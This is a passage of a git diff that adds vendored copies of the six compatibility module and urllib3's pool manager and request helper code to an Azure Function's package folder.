_urllib_robotparser_moved_attributes: + setattr(Module_six_moves_urllib_robotparser, attr.name, attr) +del attr + +Module_six_moves_urllib_robotparser._moved_attributes = ( + _urllib_robotparser_moved_attributes +) + +_importer._add_module( + Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"), + "moves.urllib_robotparser", + "moves.urllib.robotparser", +) + + +class Module_six_moves_urllib(types.ModuleType): + + """Create a six.moves.urllib namespace that resembles the Python 3 namespace""" + + __path__ = [] # mark as package + parse = _importer._get_module("moves.urllib_parse") + error = _importer._get_module("moves.urllib_error") + request = _importer._get_module("moves.urllib_request") + response = _importer._get_module("moves.urllib_response") + robotparser = _importer._get_module("moves.urllib_robotparser") + + def __dir__(self): + return ["parse", "error", "request", "response", "robotparser"] + + +_importer._add_module( + Module_six_moves_urllib(__name__ + ".moves.urllib"), "moves.urllib" +) + + +def add_move(move): + """Add an item to six.moves.""" + setattr(_MovedItems, move.name, move) + + +def remove_move(name): + """Remove item from six.moves.""" + try: + delattr(_MovedItems, name) + except AttributeError: + try: + del moves.__dict__[name] + except KeyError: + raise AttributeError("no such move, %r" % (name,)) + + +if PY3: + _meth_func = "__func__" + _meth_self = "__self__" + + _func_closure = "__closure__" + _func_code = "__code__" + _func_defaults = "__defaults__" + _func_globals = "__globals__" +else: + _meth_func = "im_func" + _meth_self = "im_self" + + _func_closure = "func_closure" + _func_code = "func_code" + _func_defaults = "func_defaults" + _func_globals = "func_globals" + + +try: + advance_iterator = next +except NameError: + + def advance_iterator(it): + return it.next() + + +next = advance_iterator + + +try: + callable = callable +except NameError: + + def callable(obj): + return any("__call__" in klass.__dict__ for klass in type(obj).__mro__) + + +if PY3: + + def get_unbound_function(unbound): + return unbound + + create_bound_method = types.MethodType + + def create_unbound_method(func, cls): + return func + + Iterator = object +else: + + def get_unbound_function(unbound): + return unbound.im_func + + def create_bound_method(func, obj): + return types.MethodType(func, obj, obj.__class__) + + def create_unbound_method(func, cls): + return types.MethodType(func, None, cls) + + class Iterator(object): + def next(self): + return type(self).__next__(self) + + callable = callable +_add_doc( + get_unbound_function, """Get the function out of a possibly unbound function""" +) + + +get_method_function = operator.attrgetter(_meth_func) +get_method_self = operator.attrgetter(_meth_self) +get_function_closure = operator.attrgetter(_func_closure) +get_function_code = operator.attrgetter(_func_code) +get_function_defaults = operator.attrgetter(_func_defaults) +get_function_globals = operator.attrgetter(_func_globals) + + +if PY3: + + def iterkeys(d, **kw): + return iter(d.keys(**kw)) + + def itervalues(d, **kw): + return iter(d.values(**kw)) + + def iteritems(d, **kw): + return iter(d.items(**kw)) + + def iterlists(d, **kw): + return iter(d.lists(**kw)) + + viewkeys = operator.methodcaller("keys") + + viewvalues = operator.methodcaller("values") + + viewitems = operator.methodcaller("items") +else: + + def iterkeys(d, **kw): + return d.iterkeys(**kw) + + def itervalues(d, **kw): + return d.itervalues(**kw) + + def iteritems(d, **kw): + return d.iteritems(**kw) + + def iterlists(d, **kw): + return d.iterlists(**kw) + + viewkeys = operator.methodcaller("viewkeys") + + viewvalues = operator.methodcaller("viewvalues") + + viewitems = operator.methodcaller("viewitems") + +_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.") +_add_doc(itervalues, "Return an iterator over the values of a dictionary.") +_add_doc(iteritems, "Return an iterator over the (key, value) pairs of a dictionary.") +_add_doc( + iterlists, "Return an iterator over the (key, [values]) pairs of a dictionary." +) + + +if PY3: + + def b(s): + return s.encode("latin-1") + + def u(s): + return s + + unichr = chr + import struct + + int2byte = struct.Struct(">B").pack + del struct + byte2int = operator.itemgetter(0) + indexbytes = operator.getitem + iterbytes = iter + import io + + StringIO = io.StringIO + BytesIO = io.BytesIO + del io + _assertCountEqual = "assertCountEqual" + if sys.version_info[1] <= 1: + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" + else: + _assertRaisesRegex = "assertRaisesRegex" + _assertRegex = "assertRegex" + _assertNotRegex = "assertNotRegex" +else: + + def b(s): + return s + + # Workaround for standalone backslash + + def u(s): + return unicode(s.replace(r"\\", r"\\\\"), "unicode_escape") + + unichr = unichr + int2byte = chr + + def byte2int(bs): + return ord(bs[0]) + + def indexbytes(buf, i): + return ord(buf[i]) + + iterbytes = functools.partial(itertools.imap, ord) + import StringIO + + StringIO = BytesIO = StringIO.StringIO + _assertCountEqual = "assertItemsEqual" + _assertRaisesRegex = "assertRaisesRegexp" + _assertRegex = "assertRegexpMatches" + _assertNotRegex = "assertNotRegexpMatches" +_add_doc(b, """Byte literal""") +_add_doc(u, """Text literal""") + + +def assertCountEqual(self, *args, **kwargs): + return getattr(self, _assertCountEqual)(*args, **kwargs) + + +def assertRaisesRegex(self, *args, **kwargs): + return getattr(self, _assertRaisesRegex)(*args, **kwargs) + + +def assertRegex(self, *args, **kwargs): + return getattr(self, _assertRegex)(*args, **kwargs) + + +def assertNotRegex(self, *args, **kwargs): + return getattr(self, _assertNotRegex)(*args, **kwargs) + + +if PY3: + exec_ = getattr(moves.builtins, "exec") + + def reraise(tp, value, tb=None): + try: + if value is None: + value = tp() + if value.__traceback__ is not tb: + raise value.with_traceback(tb) + raise value + finally: + value = None + tb = None + + +else: + + def exec_(_code_, _globs_=None, _locs_=None): + """Execute code in a namespace.""" + if _globs_ is None: + frame = sys._getframe(1) + _globs_ = frame.f_globals + if _locs_ is None: + _locs_ = frame.f_locals + del frame + elif _locs_ is None: + _locs_ = _globs_ + exec ("""exec _code_ in _globs_, _locs_""") + + exec_( + """def reraise(tp, value, tb=None): + try: + raise tp, value, tb + finally: + tb = None +""" + ) + + +if sys.version_info[:2] > (3,): + exec_( + """def raise_from(value, from_value): + try: + raise value from from_value + finally: + value = None +""" + ) +else: + + def raise_from(value, from_value): + raise value + + +print_ = getattr(moves.builtins, "print", None) +if print_ is None: + + def print_(*args, **kwargs): + """The new-style print function for Python 2.4 and 2.5.""" + fp = kwargs.pop("file", sys.stdout) + if fp is None: + return + + def write(data): + if not isinstance(data, basestring): + data = str(data) + # If the file has an encoding, encode unicode with it. + if ( + isinstance(fp, file) + and isinstance(data, unicode) + and fp.encoding is not None + ): + errors = getattr(fp, "errors", None) + if errors is None: + errors = "strict" + data = data.encode(fp.encoding, errors) + fp.write(data) + + want_unicode = False + sep = kwargs.pop("sep", None) + if sep is not None: + if isinstance(sep, unicode): + want_unicode = True + elif not isinstance(sep, str): + raise TypeError("sep must be None or a string") + end = kwargs.pop("end", None) + if end is not None: + if isinstance(end, unicode): + want_unicode = True + elif not isinstance(end, str): + raise TypeError("end must be None or a string") + if kwargs: + raise TypeError("invalid keyword arguments to print()") + if not want_unicode: + for arg in args: + if isinstance(arg, unicode): + want_unicode = True + break + if want_unicode: + newline = unicode("\n") + space = unicode(" ") + else: + newline = "\n" + space = " " + if sep is None: + sep = space + if end is None: + end = newline + for i, arg in enumerate(args): + if i: + write(sep) + write(arg) + write(end) + + +if sys.version_info[:2] < (3, 3): + _print = print_ + + def print_(*args, **kwargs): + fp = kwargs.get("file", sys.stdout) + flush = kwargs.pop("flush", False) + _print(*args, **kwargs) + if flush and fp is not None: + fp.flush() + + +_add_doc(reraise, """Reraise an exception.""") + +if sys.version_info[0:2] < (3, 4): + # This does exactly the same what the :func:`py3:functools.update_wrapper` + # function does on Python versions after 3.2. It sets the ``__wrapped__`` + # attribute on ``wrapper`` object and it doesn't raise an error if any of + # the attributes mentioned in ``assigned`` and ``updated`` are missing on + # ``wrapped`` object. + def _update_wrapper( + wrapper, + wrapped, + assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES, + ): + for attr in assigned: + try: + value = getattr(wrapped, attr) + except AttributeError: + continue + else: + setattr(wrapper, attr, value) + for attr in updated: + getattr(wrapper, attr).update(getattr(wrapped, attr, {})) + wrapper.__wrapped__ = wrapped + return wrapper + + _update_wrapper.__doc__ = functools.update_wrapper.__doc__ + + def wraps( + wrapped, + assigned=functools.WRAPPER_ASSIGNMENTS, + updated=functools.WRAPPER_UPDATES, + ): + return functools.partial( + _update_wrapper, wrapped=wrapped, assigned=assigned, updated=updated + ) + + wraps.__doc__ = functools.wraps.__doc__ + +else: + wraps = functools.wraps + + +def with_metaclass(meta, *bases): + """Create a base class with a metaclass.""" + # This requires a bit of explanation: the basic idea is to make a dummy + # metaclass for one level of class instantiation that replaces itself with + # the actual metaclass. + class metaclass(type): + def __new__(cls, name, this_bases, d): + if sys.version_info[:2] >= (3, 7): + # This version introduced PEP 560 that requires a bit + # of extra care (we mimic what is done by __build_class__). + resolved_bases = types.resolve_bases(bases) + if resolved_bases is not bases: + d["__orig_bases__"] = bases + else: + resolved_bases = bases + return meta(name, resolved_bases, d) + + @classmethod + def __prepare__(cls, name, this_bases): + return meta.__prepare__(name, bases) + + return type.__new__(metaclass, "temporary_class", (), {}) + + +def add_metaclass(metaclass): + """Class decorator for creating a class with a metaclass.""" + + def wrapper(cls): + orig_vars = cls.__dict__.copy() + slots = orig_vars.get("__slots__") + if slots is not None: + if isinstance(slots, str): + slots = [slots] + for slots_var in slots: + orig_vars.pop(slots_var) + orig_vars.pop("__dict__", None) + orig_vars.pop("__weakref__", None) + if hasattr(cls, "__qualname__"): + orig_vars["__qualname__"] = cls.__qualname__ + return metaclass(cls.__name__, cls.__bases__, orig_vars) + + return wrapper + + +def ensure_binary(s, encoding="utf-8", errors="strict"): + """Coerce **s** to six.binary_type. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> encoded to `bytes` + - `bytes` -> `bytes` + """ + if isinstance(s, binary_type): + return s + if isinstance(s, text_type): + return s.encode(encoding, errors) + raise TypeError("not expecting type '%s'" % type(s)) + + +def ensure_str(s, encoding="utf-8", errors="strict"): + """Coerce *s* to `str`. + + For Python 2: + - `unicode` -> encoded to `str` + - `str` -> `str` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + # Optimization: Fast return for the common case. + if type(s) is str: + return s + if PY2 and isinstance(s, text_type): + return s.encode(encoding, errors) + elif PY3 and isinstance(s, binary_type): + return s.decode(encoding, errors) + elif not isinstance(s, (text_type, binary_type)): + raise TypeError("not expecting type '%s'" % type(s)) + return s + + +def ensure_text(s, encoding="utf-8", errors="strict"): + """Coerce *s* to six.text_type. + + For Python 2: + - `unicode` -> `unicode` + - `str` -> `unicode` + + For Python 3: + - `str` -> `str` + - `bytes` -> decoded to `str` + """ + if isinstance(s, binary_type): + return s.decode(encoding, errors) + elif isinstance(s, text_type): + return s + else: + raise TypeError("not expecting type '%s'" % type(s)) + + +def python_2_unicode_compatible(klass): + """ + A class decorator that defines __unicode__ and __str__ methods under Python 2. + Under Python 3 it does nothing. + + To support Python 2 and 3 with a single code base, define a __str__ method + returning text and apply this decorator to the class. + """ + if PY2: + if "__str__" not in klass.__dict__: + raise ValueError( + "@python_2_unicode_compatible cannot be applied " + "to %s because it doesn't define __str__()." % klass.__name__ + ) + klass.__unicode__ = klass.__str__ + klass.__str__ = lambda self: self.__unicode__().encode("utf-8") + return klass + + +# Complete the moves implementation. +# This code is at the end of this module to speed up module loading. +# Turn this module into a package. +__path__ = [] # required for PEP 302 and PEP 451 +__package__ = __name__ # see PEP 366 @ReservedAssignment +if globals().get("__spec__") is not None: + __spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable +# Remove other six meta path importers, since they cause problems. This can +# happen if six is removed from sys.modules and then reloaded. (Setuptools does +# this for some reason.) +if sys.meta_path: + for i, importer in enumerate(sys.meta_path): + # Here's some real nastiness: Another "instance" of the six module might + # be floating around. Therefore, we can't use isinstance() to check for + # the six meta path importer, since the other six instance will have + # inserted an importer with different class. + if ( + type(importer).__name__ == "_SixMetaPathImporter" + and importer.name == __name__ + ): + del sys.meta_path[i] + break + del i, importer +# Finally, add the importer to the meta path import hook. +sys.meta_path.append(_importer) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/poolmanager.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/poolmanager.py new file mode 100644 index 0000000..a5848b3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/poolmanager.py @@ -0,0 +1,537 @@ +from __future__ import absolute_import + +import collections +import functools +import logging + +from ._collections import RecentlyUsedContainer +from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, port_by_scheme +from .exceptions import ( + LocationValueError, + MaxRetryError, + ProxySchemeUnknown, + ProxySchemeUnsupported, + URLSchemeUnknown, +) +from .packages import six +from .packages.six.moves.urllib.parse import urljoin +from .request import RequestMethods +from .util.proxy import connection_requires_http_tunnel +from .util.retry import Retry +from .util.url import parse_url + +__all__ = ["PoolManager", "ProxyManager", "proxy_from_url"] + + +log = logging.getLogger(__name__) + +SSL_KEYWORDS = ( + "key_file", + "cert_file", + "cert_reqs", + "ca_certs", + "ssl_version", + "ca_cert_dir", + "ssl_context", + "key_password", + "server_hostname", +) + +# All known keyword arguments that could be provided to the pool manager, its +# pools, or the underlying connections. This is used to construct a pool key. +_key_fields = ( + "key_scheme", # str + "key_host", # str + "key_port", # int + "key_timeout", # int or float or Timeout + "key_retries", # int or Retry + "key_strict", # bool + "key_block", # bool + "key_source_address", # str + "key_key_file", # str + "key_key_password", # str + "key_cert_file", # str + "key_cert_reqs", # str + "key_ca_certs", # str + "key_ssl_version", # str + "key_ca_cert_dir", # str + "key_ssl_context", # instance of ssl.SSLContext or urllib3.util.ssl_.SSLContext + "key_maxsize", # int + "key_headers", # dict + "key__proxy", # parsed proxy url + "key__proxy_headers", # dict + "key__proxy_config", # class + "key_socket_options", # list of (level (int), optname (int), value (int or str)) tuples + "key__socks_options", # dict + "key_assert_hostname", # bool or string + "key_assert_fingerprint", # str + "key_server_hostname", # str +) + +#: The namedtuple class used to construct keys for the connection pool. +#: All custom key schemes should include the fields in this key at a minimum. +PoolKey = collections.namedtuple("PoolKey", _key_fields) + +_proxy_config_fields = ("ssl_context", "use_forwarding_for_https") +ProxyConfig = collections.namedtuple("ProxyConfig", _proxy_config_fields) + + +def _default_key_normalizer(key_class, request_context): + """ + Create a pool key out of a request context dictionary. + + According to RFC 3986, both the scheme and host are case-insensitive. + Therefore, this function normalizes both before constructing the pool + key for an HTTPS request. If you wish to change this behaviour, provide + alternate callables to ``key_fn_by_scheme``. + + :param key_class: + The class to use when constructing the key. This should be a namedtuple + with the ``scheme`` and ``host`` keys at a minimum. + :type key_class: namedtuple + :param request_context: + A dictionary-like object that contain the context for a request. + :type request_context: dict + + :return: A namedtuple that can be used as a connection pool key. + :rtype: PoolKey + """ + # Since we mutate the dictionary, make a copy first + context = request_context.copy() + context["scheme"] = context["scheme"].lower() + context["host"] = context["host"].lower() + + # These are both dictionaries and need to be transformed into frozensets + for key in ("headers", "_proxy_headers", "_socks_options"): + if key in context and context[key] is not None: + context[key] = frozenset(context[key].items()) + + # The socket_options key may be a list and needs to be transformed into a + # tuple. + socket_opts = context.get("socket_options") + if socket_opts is not None: + context["socket_options"] = tuple(socket_opts) + + # Map the kwargs to the names in the namedtuple - this is necessary since + # namedtuples can't have fields starting with '_'. + for key in list(context.keys()): + context["key_" + key] = context.pop(key) + + # Default to ``None`` for keys missing from the context + for field in key_class._fields: + if field not in context: + context[field] = None + + return key_class(**context) + + +#: A dictionary that maps a scheme to a callable that creates a pool key. +#: This can be used to alter the way pool keys are constructed, if desired. +#: Each PoolManager makes a copy of this dictionary so they can be configured +#: globally here, or individually on the instance. +key_fn_by_scheme = { + "http": functools.partial(_default_key_normalizer, PoolKey), + "https": functools.partial(_default_key_normalizer, PoolKey), +} + +pool_classes_by_scheme = {"http": HTTPConnectionPool, "https": HTTPSConnectionPool} + + +class PoolManager(RequestMethods): + """ + Allows for arbitrary requests while transparently keeping track of + necessary connection pools for you. + + :param num_pools: + Number of connection pools to cache before discarding the least + recently used pool. + + :param headers: + Headers to include with all requests, unless other headers are given + explicitly. + + :param \\**connection_pool_kw: + Additional parameters are used to create fresh + :class:`urllib3.connectionpool.ConnectionPool` instances. + + Example:: + + >>> manager = PoolManager(num_pools=2) + >>> r = manager.request('GET', 'http://google.com/') + >>> r = manager.request('GET', 'http://google.com/mail') + >>> r = manager.request('GET', 'http://yahoo.com/') + >>> len(manager.pools) + 2 + + """ + + proxy = None + proxy_config = None + + def __init__(self, num_pools=10, headers=None, **connection_pool_kw): + RequestMethods.__init__(self, headers) + self.connection_pool_kw = connection_pool_kw + self.pools = RecentlyUsedContainer(num_pools, dispose_func=lambda p: p.close()) + + # Locally set the pool classes and keys so other PoolManagers can + # override them. + self.pool_classes_by_scheme = pool_classes_by_scheme + self.key_fn_by_scheme = key_fn_by_scheme.copy() + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + self.clear() + # Return False to re-raise any potential exceptions + return False + + def _new_pool(self, scheme, host, port, request_context=None): + """ + Create a new :class:`urllib3.connectionpool.ConnectionPool` based on host, port, scheme, and + any additional pool keyword arguments. + + If ``request_context`` is provided, it is provided as keyword arguments + to the pool class used. This method is used to actually create the + connection pools handed out by :meth:`connection_from_url` and + companion methods. It is intended to be overridden for customization. + """ + pool_cls = self.pool_classes_by_scheme[scheme] + if request_context is None: + request_context = self.connection_pool_kw.copy() + + # Although the context has everything necessary to create the pool, + # this function has historically only used the scheme, host, and port + # in the positional args. When an API change is acceptable these can + # be removed. + for key in ("scheme", "host", "port"): + request_context.pop(key, None) + + if scheme == "http": + for kw in SSL_KEYWORDS: + request_context.pop(kw, None) + + return pool_cls(host, port, **request_context) + + def clear(self): + """ + Empty our store of pools and direct them all to close. + + This will not affect in-flight connections, but they will not be + re-used after completion. + """ + self.pools.clear() + + def connection_from_host(self, host, port=None, scheme="http", pool_kwargs=None): + """ + Get a :class:`urllib3.connectionpool.ConnectionPool` based on the host, port, and scheme. + + If ``port`` isn't given, it will be derived from the ``scheme`` using + ``urllib3.connectionpool.port_by_scheme``. If ``pool_kwargs`` is + provided, it is merged with the instance's ``connection_pool_kw`` + variable and used to create the new connection pool, if one is + needed. + """ + + if not host: + raise LocationValueError("No host specified.") + + request_context = self._merge_pool_kwargs(pool_kwargs) + request_context["scheme"] = scheme or "http" + if not port: + port = port_by_scheme.get(request_context["scheme"].lower(), 80) + request_context["port"] = port + request_context["host"] = host + + return self.connection_from_context(request_context) + + def connection_from_context(self, request_context): + """ + Get a :class:`urllib3.connectionpool.ConnectionPool` based on the request context. + + ``request_context`` must at least contain the ``scheme`` key and its + value must be a key in ``key_fn_by_scheme`` instance variable. + """ + scheme = request_context["scheme"].lower() + pool_key_constructor = self.key_fn_by_scheme.get(scheme) + if not pool_key_constructor: + raise URLSchemeUnknown(scheme) + pool_key = pool_key_constructor(request_context) + + return self.connection_from_pool_key(pool_key, request_context=request_context) + + def connection_from_pool_key(self, pool_key, request_context=None): + """ + Get a :class:`urllib3.connectionpool.ConnectionPool` based on the provided pool key. + + ``pool_key`` should be a namedtuple that only contains immutable + objects. At a minimum it must have the ``scheme``, ``host``, and + ``port`` fields. + """ + with self.pools.lock: + # If the scheme, host, or port doesn't match existing open + # connections, open a new ConnectionPool. + pool = self.pools.get(pool_key) + if pool: + return pool + + # Make a fresh ConnectionPool of the desired type + scheme = request_context["scheme"] + host = request_context["host"] + port = request_context["port"] + pool = self._new_pool(scheme, host, port, request_context=request_context) + self.pools[pool_key] = pool + + return pool + + def connection_from_url(self, url, pool_kwargs=None): + """ + Similar to :func:`urllib3.connectionpool.connection_from_url`. + + If ``pool_kwargs`` is not provided and a new pool needs to be + constructed, ``self.connection_pool_kw`` is used to initialize + the :class:`urllib3.connectionpool.ConnectionPool`. If ``pool_kwargs`` + is provided, it is used instead. Note that if a new pool does not + need to be created for the request, the provided ``pool_kwargs`` are + not used. + """ + u = parse_url(url) + return self.connection_from_host( + u.host, port=u.port, scheme=u.scheme, pool_kwargs=pool_kwargs + ) + + def _merge_pool_kwargs(self, override): + """ + Merge a dictionary of override values for self.connection_pool_kw. + + This does not modify self.connection_pool_kw and returns a new dict. + Any keys in the override dictionary with a value of ``None`` are + removed from the merged dictionary. + """ + base_pool_kwargs = self.connection_pool_kw.copy() + if override: + for key, value in override.items(): + if value is None: + try: + del base_pool_kwargs[key] + except KeyError: + pass + else: + base_pool_kwargs[key] = value + return base_pool_kwargs + + def _proxy_requires_url_absolute_form(self, parsed_url): + """ + Indicates if the proxy requires the complete destination URL in the + request. Normally this is only needed when not using an HTTP CONNECT + tunnel. + """ + if self.proxy is None: + return False + + return not connection_requires_http_tunnel( + self.proxy, self.proxy_config, parsed_url.scheme + ) + + def _validate_proxy_scheme_url_selection(self, url_scheme): + """ + Validates that were not attempting to do TLS in TLS connections on + Python2 or with unsupported SSL implementations. + """ + if self.proxy is None or url_scheme != "https": + return + + if self.proxy.scheme != "https": + return + + if six.PY2 and not self.proxy_config.use_forwarding_for_https: + raise ProxySchemeUnsupported( + "Contacting HTTPS destinations through HTTPS proxies " + "'via CONNECT tunnels' is not supported in Python 2" + ) + + def urlopen(self, method, url, redirect=True, **kw): + """ + Same as :meth:`urllib3.HTTPConnectionPool.urlopen` + with custom cross-host redirect logic and only sends the request-uri + portion of the ``url``. + + The given ``url`` parameter must be absolute, such that an appropriate + :class:`urllib3.connectionpool.ConnectionPool` can be chosen for it. + """ + u = parse_url(url) + self._validate_proxy_scheme_url_selection(u.scheme) + + conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme) + + kw["assert_same_host"] = False + kw["redirect"] = False + + if "headers" not in kw: + kw["headers"] = self.headers.copy() + + if self._proxy_requires_url_absolute_form(u): + response = conn.urlopen(method, url, **kw) + else: + response = conn.urlopen(method, u.request_uri, **kw) + + redirect_location = redirect and response.get_redirect_location() + if not redirect_location: + return response + + # Support relative URLs for redirecting. + redirect_location = urljoin(url, redirect_location) + + # RFC 7231, Section 6.4.4 + if response.status == 303: + method = "GET" + + retries = kw.get("retries") + if not isinstance(retries, Retry): + retries = Retry.from_int(retries, redirect=redirect) + + # Strip headers marked as unsafe to forward to the redirected location. + # Check remove_headers_on_redirect to avoid a potential network call within + # conn.is_same_host() which may use socket.gethostbyname() in the future. + if retries.remove_headers_on_redirect and not conn.is_same_host( + redirect_location + ): + headers = list(six.iterkeys(kw["headers"])) + for header in headers: + if header.lower() in retries.remove_headers_on_redirect: + kw["headers"].pop(header, None) + + try: + retries = retries.increment(method, url, response=response, _pool=conn) + except MaxRetryError: + if retries.raise_on_redirect: + response.drain_conn() + raise + return response + + kw["retries"] = retries + kw["redirect"] = redirect + + log.info("Redirecting %s -> %s", url, redirect_location) + + response.drain_conn() + return self.urlopen(method, redirect_location, **kw) + + +class ProxyManager(PoolManager): + """ + Behaves just like :class:`PoolManager`, but sends all requests through + the defined proxy, using the CONNECT method for HTTPS URLs. + + :param proxy_url: + The URL of the proxy to be used. + + :param proxy_headers: + A dictionary containing headers that will be sent to the proxy. In case + of HTTP they are being sent with each request, while in the + HTTPS/CONNECT case they are sent only once. Could be used for proxy + authentication. + + :param proxy_ssl_context: + The proxy SSL context is used to establish the TLS connection to the + proxy when using HTTPS proxies. + + :param use_forwarding_for_https: + (Defaults to False) If set to True will forward requests to the HTTPS + proxy to be made on behalf of the client instead of creating a TLS + tunnel via the CONNECT method. **Enabling this flag means that request + and response headers and content will be visible from the HTTPS proxy** + whereas tunneling keeps request and response headers and content + private. IP address, target hostname, SNI, and port are always visible + to an HTTPS proxy even when this flag is disabled. + + Example: + >>> proxy = urllib3.ProxyManager('http://localhost:3128/') + >>> r1 = proxy.request('GET', 'http://google.com/') + >>> r2 = proxy.request('GET', 'http://httpbin.org/') + >>> len(proxy.pools) + 1 + >>> r3 = proxy.request('GET', 'https://httpbin.org/') + >>> r4 = proxy.request('GET', 'https://twitter.com/') + >>> len(proxy.pools) + 3 + + """ + + def __init__( + self, + proxy_url, + num_pools=10, + headers=None, + proxy_headers=None, + proxy_ssl_context=None, + use_forwarding_for_https=False, + **connection_pool_kw + ): + + if isinstance(proxy_url, HTTPConnectionPool): + proxy_url = "%s://%s:%i" % ( + proxy_url.scheme, + proxy_url.host, + proxy_url.port, + ) + proxy = parse_url(proxy_url) + + if proxy.scheme not in ("http", "https"): + raise ProxySchemeUnknown(proxy.scheme) + + if not proxy.port: + port = port_by_scheme.get(proxy.scheme, 80) + proxy = proxy._replace(port=port) + + self.proxy = proxy + self.proxy_headers = proxy_headers or {} + self.proxy_ssl_context = proxy_ssl_context + self.proxy_config = ProxyConfig(proxy_ssl_context, use_forwarding_for_https) + + connection_pool_kw["_proxy"] = self.proxy + connection_pool_kw["_proxy_headers"] = self.proxy_headers + connection_pool_kw["_proxy_config"] = self.proxy_config + + super(ProxyManager, self).__init__(num_pools, headers, **connection_pool_kw) + + def connection_from_host(self, host, port=None, scheme="http", pool_kwargs=None): + if scheme == "https": + return super(ProxyManager, self).connection_from_host( + host, port, scheme, pool_kwargs=pool_kwargs + ) + + return super(ProxyManager, self).connection_from_host( + self.proxy.host, self.proxy.port, self.proxy.scheme, pool_kwargs=pool_kwargs + ) + + def _set_proxy_headers(self, url, headers=None): + """ + Sets headers needed by proxies: specifically, the Accept and Host + headers. Only sets headers not provided by the user. + """ + headers_ = {"Accept": "*/*"} + + netloc = parse_url(url).netloc + if netloc: + headers_["Host"] = netloc + + if headers: + headers_.update(headers) + return headers_ + + def urlopen(self, method, url, redirect=True, **kw): + "Same as HTTP(S)ConnectionPool.urlopen, ``url`` must be absolute." + u = parse_url(url) + if not connection_requires_http_tunnel(self.proxy, self.proxy_config, u.scheme): + # For connections using HTTP CONNECT, httplib sets the necessary + # headers on the CONNECT to the proxy. If we're not using CONNECT, + # we'll definitely need to set 'Host' at the very least. + headers = kw.get("headers", self.headers) + kw["headers"] = self._set_proxy_headers(url, headers) + + return super(ProxyManager, self).urlopen(method, url, redirect=redirect, **kw) + + +def proxy_from_url(url, **kw): + return ProxyManager(proxy_url=url, **kw) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/request.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/request.py new file mode 100644 index 0000000..3ee2dd9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/request.py @@ -0,0 +1,170 @@ +from __future__ import absolute_import + +from .filepost import encode_multipart_formdata +from .packages.six.moves.urllib.parse import urlencode + +__all__ = ["RequestMethods"] + + +class RequestMethods(object): + """ + Convenience mixin for classes who implement a :meth:`urlopen` method, such + as :class:`urllib3.HTTPConnectionPool` and + :class:`urllib3.PoolManager`. + + Provides behavior for making common types of HTTP request methods and + decides which type of request field encoding to use. + + Specifically, + + :meth:`.request_encode_url` is for sending requests whose fields are + encoded in the URL (such as GET, HEAD, DELETE). + + :meth:`.request_encode_body` is for sending requests whose fields are + encoded in the *body* of the request using multipart or www-form-urlencoded + (such as for POST, PUT, PATCH). + + :meth:`.request` is for making any kind of request, it will look up the + appropriate encoding format and use one of the above two methods to make + the request. + + Initializer parameters: + + :param headers: + Headers to include with all requests, unless other headers are given + explicitly. + """ + + _encode_url_methods = {"DELETE", "GET", "HEAD", "OPTIONS"} + + def __init__(self, headers=None): + self.headers = headers or {} + + def urlopen( + self, + method, + url, + body=None, + headers=None, + encode_multipart=True, + multipart_boundary=None, + **kw + ): # Abstract + raise NotImplementedError( + "Classes extending RequestMethods must implement " + "their own ``urlopen`` method." + ) + + def request(self, method, url, fields=None, headers=None, **urlopen_kw): + """ + Make a request using :meth:`urlopen` with the appropriate encoding of + ``fields`` based on the ``method`` used. + + This is a convenience method that requires the least amount of manual + effort. It can be used in most situations, while still having the + option to drop down to more specific methods when necessary, such as + :meth:`request_encode_url`, :meth:`request_encode_body`, + or even the lowest level :meth:`urlopen`. + """ + method = method.upper() + + urlopen_kw["request_url"] = url + + if method in self._encode_url_methods: + return self.request_encode_url( + method, url, fields=fields, headers=headers, **urlopen_kw + ) + else: + return self.request_encode_body( + method, url, fields=fields, headers=headers, **urlopen_kw + ) + + def request_encode_url(self, method, url, fields=None, headers=None, **urlopen_kw): + """ + Make a request using :meth:`urlopen` with the ``fields`` encoded in + the url. This is useful for request methods like GET, HEAD, DELETE, etc. + """ + if headers is None: + headers = self.headers + + extra_kw = {"headers": headers} + extra_kw.update(urlopen_kw) + + if fields: + url += "?" + urlencode(fields) + + return self.urlopen(method, url, **extra_kw) + + def request_encode_body( + self, + method, + url, + fields=None, + headers=None, + encode_multipart=True, + multipart_boundary=None, + **urlopen_kw + ): + """ + Make a request using :meth:`urlopen` with the ``fields`` encoded in + the body. This is useful for request methods like POST, PUT, PATCH, etc. + + When ``encode_multipart=True`` (default), then + :func:`urllib3.encode_multipart_formdata` is used to encode + the payload with the appropriate content type. Otherwise + :func:`urllib.parse.urlencode` is used with the + 'application/x-www-form-urlencoded' content type. + + Multipart encoding must be used when posting files, and it's reasonably + safe to use it in other times too. However, it may break request + signing, such as with OAuth. + + Supports an optional ``fields`` parameter of key/value strings AND + key/filetuple. A filetuple is a (filename, data, MIME type) tuple where + the MIME type is optional. For example:: + + fields = { + 'foo': 'bar', + 'fakefile': ('foofile.txt', 'contents of foofile'), + 'realfile': ('barfile.txt', open('realfile').read()), + 'typedfile': ('bazfile.bin', open('bazfile').read(), + 'image/jpeg'), + 'nonamefile': 'contents of nonamefile field', + } + + When uploading a file, providing a filename (the first parameter of the + tuple) is optional but recommended to best mimic behavior of browsers. + + Note that if ``headers`` are supplied, the 'Content-Type' header will + be overwritten because it depends on the dynamic random boundary string + which is used to compose the body of the request. The random boundary + string can be explicitly set with the ``multipart_boundary`` parameter. + """ + if headers is None: + headers = self.headers + + extra_kw = {"headers": {}} + + if fields: + if "body" in 